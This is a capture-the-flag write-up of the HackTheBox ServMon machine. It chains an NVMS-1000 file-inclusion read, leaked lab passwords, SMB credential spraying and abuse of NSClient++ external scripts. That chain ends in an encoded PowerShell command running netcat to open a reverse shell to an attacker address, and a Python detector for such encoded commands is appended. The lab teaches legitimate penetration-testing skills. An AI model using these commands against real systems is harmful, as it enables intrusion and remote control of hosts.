HackTheBox - ServMon

Last updated 4 years ago

Nmap scan results

nmap -sC -sV -oA nmap-allportscan -p- 10.10.10.184

Enumerating FTP Server (Anonymous login allowed)

┌──(root㉿LAPTOP-UFMALO92)-[/home/akshay/Desktop/HackTheBox/Machines/Windows-Easy/Servmon]
└─# cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

└─# cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

NVMS-1000 Running on port 80

NVMS-1000 is a CMS software which is specially designed for network video surveillance using our Pro Series DVRs. Once installed the super administrator can control all Pro Series cameras to monitor live video, record video, playback video and backup video right from your PC.

There is a known LFI vulnerability in this CMS software; we can confirm it with the searchsploit command on Linux.

The note from Nadine says she left Nathan's Passwords.txt file on his Desktop. We can read that file through the Local File Inclusion.

# Contents of Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Using crackmapexec to find a valid user with credentials

crackmapexec smb 10.10.10.184 -u users.txt -p pass.txt

I tried to access SMB shares as the Nadine user, but didn't get anything. Instead I only got read access to the IPC$ share (not so useful).

SSH Access as Nadine

Exploiting NSClient++ (Remote Code Execution)

We also have NSClient++ running on port 8443; we can get the web interface password for it by browsing to the following directory.

NSClient++ is a monitoring agent/daemon for Windows systems that works with Nagios. It is a replacement for NSClient and NRPE_NT. NSClient++ can be extended in two ways: you can either write your own plug-in or you can execute an external script (as of now batch/exe/*)

cd "C:\Program Files\NSClient++"
type nsclient.ini
REM nsclient.ini contains the web interface password

Another way to get the password is to use the nscp.exe executable, as described in the NSClient++ documentation.

nscp.exe web -- password --display
Current password: ew2x6SsGTxjRwXOT

allowed hosts is set to 127.0.0.1 in nsclient.ini, which is why we can't reach the web interface remotely. We can use SSH port forwarding through Nadine's SSH access to get around this. For defenders, this shows that restricting a management interface to loopback offers little protection once a low-privileged user has a shell on the host, and it does not make up for a password that ordinary users can read from the configuration file.

Go to Settings -> External Scripts -> Scripts -> Add New. Then fill in the following details.

Then click Reload to restart the service; if you check the Queries page, this is how it should look.

Now you can run the script by clicking on the pleasework entry we just created and then clicking Run.

Let's try to get a shell now. Fetch the nc (netcat) executable using the curl command.

echo "C:\temp\nc64.exe 10.10.14.5 9001 -e powershell" | iconv -t utf-16le | base64 -w 0
echo powershell -enc QwA6AFwAdABlAG0AcABcAG4AYwA2ADQALgBlAHgAZQAgADEAMAAuADEAMAAuADEANAAuADUAIAA5ADAAMAAxACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAKAA== > script.bat

Now listen on port 9001 and run the script to get the reverse connection back.
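A defender-side counterpart to the encoded command above, added here as an example and not part of the original write-up: it finds `powershell -enc` arguments in process-creation command lines, decodes the UTF-16LE base64 and flags decoded commands that reference netcat. The sample events are constructed (one of them carries the write-up's own blob), and the marker list and (pid, command_line) event format are assumptions.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# "powershell ... -e/-ec/-enc/-EncodedCommand <base64>": PowerShell accepts any
# unambiguous prefix of -EncodedCommand, so the flag is matched loosely.
ENC_CMD_RE = re.compile(
    r"(?i)\bpowershell(?:\.exe)?\b.*?\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]+={0,2})"
)
# Decoded-command substrings worth a closer look; constructed for this example
# from the tooling the write-up uses (netcat started with -e).
SUSPICIOUS_MARKERS = ("nc64.exe", "nc.exe", " -e powershell", " -e cmd")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an encoded PowerShell argument, or None.
    The argument is base64 over UTF-16LE text; anything that does not decode
    cleanly is treated as 'not an encoded command' rather than raising."""
    m = ENC_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le").strip()
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(events: List[Tuple[int, str]]) -> List[dict]:
    """Decode every encoded command line in (pid, command_line) events, e.g.
    from Sysmon event ID 1 or Security 4688, and flag the suspicious ones."""
    findings = []
    for pid, cmdline in events:
        decoded = decode_encoded_command(cmdline)
        if decoded is None:
            continue  # not an encoded command (or not decodable): skip
        hits = [mk for mk in SUSPICIOUS_MARKERS if mk.lower() in decoded.lower()]
        findings.append({"pid": pid, "decoded": decoded, "suspicious": bool(hits)})
    return findings

# Constructed sample events: the write-up's own encoded payload, a benign
# encoded command, a plain command line, and a malformed base64 blob.
SAMPLE_EVENTS = [
    (4120, "powershell -enc QwA6AFwAdABlAG0AcABcAG4AYwA2ADQALgBlAHgAZQAgADEAMAAuADEAMAAuADEANAAuADUAIAA5ADAAMAAxACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAKAA=="),
    (4131, "powershell.exe -NoProfile -EncodedCommand "
           + base64.b64encode("Get-Date".encode("utf-16le")).decode()),
    (4140, "powershell -Command Get-Date"),
    (4152, "powershell -enc notbase64!!!"),
]
```

Run `triage(SAMPLE_EVENTS)` to see the decoded payload from the write-up flagged as suspicious while the benign Get-Date command is decoded but not flagged.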